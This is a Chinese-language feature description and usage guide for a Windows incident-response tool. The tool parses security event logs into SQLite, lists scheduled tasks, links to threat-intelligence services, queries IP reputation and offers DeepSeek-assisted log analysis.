• 支持查看登录成功（4624）、登录失败（4625）、防火墙日志、用户组迁移、用户创建删除等事件
• 日志保存到 log.db（SQLite 数据库）
• UI 分页展示、点击查看完整内容
• 支持模糊查询快速定位IP和用户
• 根据数据库内容利用AI依据各个表的时间线进行安全分析(建议使用AI分析+人工确认)
• 一键快速分析功能，可以直接根据数据库生成事件摘要

目前版本为V2.0，因为在实战中1.0的出现部分bug，已经在2，0版本中修复了，防火墙日志图片仅供参考

任务调度

• 提取定时任务详情，实时刷新

• 支持任务筛选模糊查询

网站导航模块

• 云沙箱、IP反查、威胁情报、空间测绘、网站备案、常见编码解码

目前支持一键跳转，本来是计划做一个聚合类的导航栏，奈何go语言实现太麻烦，略微有点儿鸡肋性价比低就实现的跳转。

DeepseekChatAI模块

• 支持 Deepseek API 调用
• 上下文聊天、会话创建、清空、删除

在风险主机出网的条件下是支持使用ChatAI模块的，直接在Deepseek购买api量即可，总的来说完全够用。

IP情报查询模块

• 调用 VirtualTools API 查询IP
• 请求率: 每分钟4次，每日500次，每月15.5K次
• 红色标记已打标签IP

目前代码位置固定仅支持每分钟查询4个ip。

截图模块

• 点击“截图”按钮即可截取全屏
• 自动保存到当前目录下的 Screenshots 文件夹
• 支持多显示器同时截图
• 弹窗提示保存的截图数量和保存路径

使用方法

1. 启动工具后选择日志类型
2. 点击按钮执行提取，日志保存到本地数据库
3. 分页浏览日志，点击查看详情
4. 可通过筛选或时间选择缩小范围

注意事项

• 必须以管理员权限运行
• 默认拉取最近7天日志，可自定义
• 首次运行会自动创建 log.db，config.json

工具使用效果

目前在本机三层靶场测试效果还可以，基本上受控主机上测试效果还是可以的，基本上可以覆盖溯源攻击路径，不过该工具还是基于windows日志来实现的，前提是日志审核策略需要开启，目前基本上一般业务系统有做过等保和加固的常见的日志审核策略是满足需求的。并且AI的一键分析是基本上能够满足定位分析攻击路径的。